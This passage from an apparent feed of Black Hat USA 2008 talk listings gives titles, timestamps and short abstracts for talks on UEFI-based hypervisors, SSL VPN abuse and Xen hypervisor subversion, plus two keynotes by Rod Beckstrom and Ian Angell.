Combining UEFI with hypervisors paves the way for a new class of vulnerability. We will present a discussion and demonstration on the threat and opportunity that UEFI based hypervisors pose to and for system security. The emerging support for UEFI in commodity OSes (Microsoft Vista SP1) makes a rich set of pre-OS capabilities possible. The advent of processors that support virtualization in silicon over the past few years have made high performing commodity hypervisor a reality. We will discuss and demostrate loading a hypervisor via the pre-OS features of UEFI.

Black Hat USA 2008: Mike Zusman - Leveraging the Edge: Abusing SSL VPNs

Sun, 15 Mar 2009 21:36:19 -0700

Black Hat USA 2008: Joanna Rutkowska and Rafal Wojtczuk - Preventing and Detecting Xen Hypervisor Subversions

Sun, 15 Mar 2009 21:36:30 -0700

Black Hat USA 2008 Keynote: Rod Beckstrom - Natural Security

Sun, 15 Mar 2009 21:36:40 -0700

Rod Beckström is the Director of the National Cyber Security Center (NCSC) in the U.S. Department of Homeland Security and reports to Secretary Michael Chertoff.

Rod co-authored The Starfish and the Spider: The Unstoppable Power of Leaderless Organizations that presents a new model for analyzing organizations, leadership style and competitive strategy. He has co-authored three other books including one on Value at Risk (VAR), a fundamental theory of financial risk management now used to regulate banking globally.

Black Hat USA 2008 Keynote : Ian Angell - Complexity in Computer Security: a Risky Business

Sun, 15 Mar 2009 21:36:54 -0700

In this talk Professor Angell will take the devil’s advocate position, warning that computer technology is part of the problem as well as of the solution. The belief system at the core of computerization is positivist and/or statistical, and that itself leads to risk. The mixture of computers and human activity systems spawns bureaucracy and systemic risk, which can throw up singularities that defy any positivist/statistical analysis. Using black humour, Angell discusses the thin line between the utility of computers and the hazard of chaotic feedback, and ends with some advice on how to survive and prosper amongst all this complexity.